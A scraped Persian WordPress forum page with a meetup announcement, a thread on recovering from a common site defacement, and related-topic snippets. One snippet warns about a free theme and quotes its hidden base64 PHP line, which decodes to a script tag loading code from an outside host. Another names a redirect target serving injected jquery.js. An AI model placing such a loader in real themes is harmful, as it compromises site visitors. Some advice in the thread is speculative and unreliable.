• اطلاعیه ها

• Saeed Fard

برگزاری میتاپ وردپرسی   14/08/96

بعد از اولین دوره همایش وردپرس در ایران اگر پیگیر اخبار وردپرس بوده باشید، حتما خبر برگزاری چندین میتاپ و جلسه متعدد وردپرسی را شنیده‌اید، یکی از بحث‌های اصلی که محور اصلی این میتاپ‌ها بوده است برگزاری وردکمپ بود که به طور جدی دنبال می‌شود. این میتاپ‌ها و جلسات توسط جمعی از فعلان حوزه وردپرس در کنار وردپرس‌پارسی برگزار می‌شد و مسائل مربوط به این حیطه و از جمله وردکمپ مورد بحث قرار می‌گرفت. این بار با رایزنی‌هایی که با تیم اصلی وردپرس داشتیم در بخش دوم این رویدادها قصد داریم که میتاپ‌ها و جلسات وردپرسی را به صورت آزاد برگزار کنیم تا تمامی علاقه‌مندان و دوست‌داران وردپرس فرصت حضور داشته باشند و با گردهمایی، جامعه کاملتری از دوست داران وردپرس بسازیم و از تجربیات یکدیگر استفاده کنیم.   بدیهی است که این رویدادها با رویکرد مثبت در جهت سود رسانی به جامعه وردپرس و افراد حاضر در آن برگزار می‌شود و برای تمامی علاقه‌مندان به وردپرس است. پس اگر یک کاربر معمولی وردپرس یا یک توسعه دهنده هستید می‌توانید در این رویدادها شرکت کنید. ما در ملاقات‌هایمان از موارد مختلف و کاربردی وردپرس صحبت می‌کنیم و علاقمند به توسعه هر چه بیشتر وردپرس در ایران هستیم. ما وردپرس را دوست داریم. عضویت در این گروه برای همه افرادی که مایل به پیوستن هستند بدون در نظرگرفتن توانایی‌ها، مهارت‌ها، وضعیت مالی و یا معیارهای دیگر باز و رایگان است. فضای میتاپ‌ها و جلسات ما دوستانه و آزادنه و دور از هرگونه تبعیض و رفتارهای زننده است. بر این اساس از تمامی دوستانی که علاقه‌مند به شرکت در میتاپ‌های وردپرس هستند دعوت می‌شود تا از طریق لینک زیر در سایت میتاپ اقدام به ثبت‌نام کنند و منتظر خبرهای برگزاری جلسات در آینده باشند . لینک ثبت نام و عضویت : https://www.meetup.com/Iran-WordPress-Meetup    
cheeta

حل مشکل رایج ترین شکل هک وردپرس

8 پست در این موضوع قرار دارد

امروز متوجه شدم که سایت های وردپرسی که روی یک سرور خاص داشتم هک شدند. این اتفاق فقط برای سایت های وردپرسی افتاده و با سرچی که تو نت زدم متوجه شدم اکثر کاربرانی که قربانی هم شدند به همین بوده.

در این هک تمام اطلاعات سرجاش هست.

میشه وارد مدیریت شد با همون اطلاعات قبلی

فایل ایندکس رو هم که میبینی اتفاقی براش نیفتاده

فقط تو صفحه اول سایت که میخوای وارد بشی پیغام هک رو میبینی.

این هک چطوری اتفاق میافته و کدوم قسمت رو باید ایمن کرد تا تکرار نشه.

در مورد ایمن کردن کل وردپرس صحبت زیاد بوده ولی این جور هک شدن رایج ترینش هست.

پس قبل از هر کار دیگه ای راهکاری برای جلوگیری از رایج ترین شکل هک پیدا کنیم.

post-37-0-12714000-1369290118_thumb.jpg

0

به اشتراک گذاری این پست

لینک به پست

روی پوشه مدیریت پسورد بگذارید

0

به اشتراک گذاری این پست

لینک به پست

به نظر میرسه در این روش هکر وارد مدیریت نمیشه، چون هیچ چیزی در مدیریت تغییر نمیکنه،

0

به اشتراک گذاری این پست

لینک به پست

به نظر میرسه در این روش هکر وارد مدیریت نمیشه، چون هیچ چیزی در مدیریت تغییر نمیکنه،

خب همین دیفیس کردن روش های مختلف داره. یکیش از مدیریت هست که هکر حتی ایمیل و رمز مدیر را تغییر میده.

4

به اشتراک گذاری این پست

لینک به پست

ببینید شما باید اول راهی که هکر با اون تونسته وارد هاستتون بشه رو پیدا کنید.

اگه دقت کنید از طریق خود وردپرس به هیچ عنوان امکان تغییر فایل ایندکس روت وجود نداره پس نتیجه میگیریم که هکر از طریق هاست (شل) وارد هاست شده و تغییراتی که میخواسته رو اعمال کرده.

6

به اشتراک گذاری این پست

لینک به پست

ببینید شما باید اول راهی که هکر با اون تونسته وارد هاستتون بشه رو پیدا کنید.

اگه دقت کنید از طریق خود وردپرس به هیچ عنوان امکان تغییر فایل ایندکس روت وجود نداره پس نتیجه میگیریم که هکر از طریق هاست (شل) وارد هاست شده و تغییراتی که میخواسته رو اعمال کرده.

خوب چطور میشه این رو فهمید؟

البته من فعلا مشکلی ندارم و با پیشنهاداتی که تو تاپیک های دیگه فرموده بودید امنیت سایت رو بهتر کردم.

ولی از کجا میشه فهمید که هکر از چه راهی استفاده کرده؟

یه جوری بگید که هر کاربری با هر اطلاعاتی اومد تو تاپیک بفهمه

0

به اشتراک گذاری این پست

لینک به پست

اینجور ورود ها معمولا اینطوری انجام می گیره

هکر یا بهتره بگیم هکرها با فشار زیاد وارد کردن به یک سرور اون رو دان می کنند معمولا در تعطیلات که ریست سرور زمانبر بشه (معمولا به هاستهای ایرانی در عید و به غیر ایرانی ها در کریسمس حمله می کنند) بعد با نرم افزار وارد سرور می شند و بخش هایی از هاست را به طور موقت به دست می گیرند این نفوذ کاملا مجازیه و با ریست سرور و فعال شدن فایروال دیسکانکت می شند و معمولا در حد پیام ارور دادنه مگر اینکه گروه حرفه ای باشه و از قبل صفحه لاگین و تیکت پشتیبانی رو ساخته باشه و با دان شدن سروره جایگزین کنه (اینکار خودش پروسه ایه) بعد نرم افزاری که پشت فرم ورود ساختگی دارند به تعدادی که تواناییش رو داشته باشه یوزر نیم و پسورد خریداران رو ذخیره می کنه معمولا این مشخصات برای سرقت ترافیک یا فضای مرده سایتها استفاده می شده که به ندرت مالک متوجه نفوذ می شه

3

به اشتراک گذاری این پست

لینک به پست

ولی از کجا میشه فهمید که هکر از چه راهی استفاده کرده؟

از کاری که روی سایت انجام می ده

معمولا در هاست دسترسی دست بالا به پایینه پوشه ی قبل از روت رو کاربر نمی بینه ولی سرور در اختیار داره و همینطور تا پوشه ای که شسما می تونی برای یک کاربر عادی تعریف کنی و بهش دسترسی بدی

هک هم چنین وضعیتی داره

نوشتن پیام یعنی ثبت کردن قدرت هکر در هک کردن وقتی این پیام ها سری باشه و در چند سایت یک هاست تکرار می شه یعنی هکر به پوشه ای بالاتر از دسترسی کاربر اصلی سایت ها رسیده و طبیعتا از طریق سرور نفوذ کرده نه وردپرس

البته کلا این جور هک ها آسیب رسونیه خاصی ندارند و اگر هم باشه می شه با حذف فایل های مزاحم ترمیمش کرد

هکرهای خطرناک دنبال اطلاعات مالی و درگاه های پرداخت بانکی برای تخلیه حساب ها هستند

2

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط mohandes1900
      سلام خسته نباشید به همه ی فعالان انجمن
      آیا کسی هست که بدونه چرا بازدید برخی از آی پی ها از سایت خیلی زیاده؟ و این که آیا ممکنه اسپم و یا ربات باشن و از کجا باید این رو بفهیمد؟
      آیا ممکنه ربات موتورهای جستجو باشه و از کجا باید این رو بفهمیم؟
    • توسط admintory
      سلام
      صورت مسئله:
      روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.
      آدرس سایت مورد نظر: http://golbahardaneh.com
      این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js
      هیچ بک آپی از قبل ندارم.
      کاری که من کردم:
      1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.
      2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.
      3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.
      4- توی htaccess آدرس هدف رو بن کردم.
      5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش
      6- وردپرس و پلاگین ها رو آپدیت کردم.

ولی هنوز مشکل حل نشده. لطفا کمک کنید.
      نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model
    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط m2ostafa
      سلام من  سایتم ۲ بار  هک شده بود بخاطر همین یسری فایل های مخرب توش دیده بودم و سعی کردم پاک کنم.یبار کامل سایت رفت پایین و مجبور به ریکاوری شدیم.الان سایت بالاست اما خیلی هنوز فایل های مخرب توش تکثیر میشه اونقدر که دیگه الان هاست ۱ گیگم پر شده در صورتی که ۳۰۰ مگ دیتا بیشتر ندارم.کسی می تونه کمکم کنه بگه چجوری فایل هارو پیدا کنم؟